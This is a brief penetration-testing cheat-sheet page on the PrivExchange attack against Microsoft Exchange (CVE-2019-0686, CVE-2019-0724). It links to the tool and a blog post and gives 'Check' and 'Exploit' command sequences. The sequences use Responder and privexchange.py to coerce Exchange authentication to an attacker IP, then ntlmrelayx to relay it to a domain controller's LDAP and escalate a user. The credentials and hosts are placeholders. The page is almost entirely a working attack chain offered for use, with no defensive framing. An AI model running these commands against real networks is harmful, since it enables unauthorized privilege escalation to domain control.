PrivExchange

CVE-2019-0686, CVE-2019-0724
​https://github.com/dirkjanm/PrivExchange​
​https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/​
Check:
$ sudo ./Responder.py -I eth0 -Av
$ python privexchange.py -d MEGACORP -u snovvcrash -p 'Passw0rd!' -ah 10.10.13.37 --attacker-page '/test/test/test' exch01.megacorp.local --debug
Exploit:
$ ntlmrelayx.py -t ldap://DC01.megacorp.local --escalate-user snovvcrash --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs
$ python privexchange.py -d MEGACORP -u snovvcrash -p 'Passw0rd!' -ah 10.10.13.37 exch01.megacorp.local --debug
Last modified 7mo ago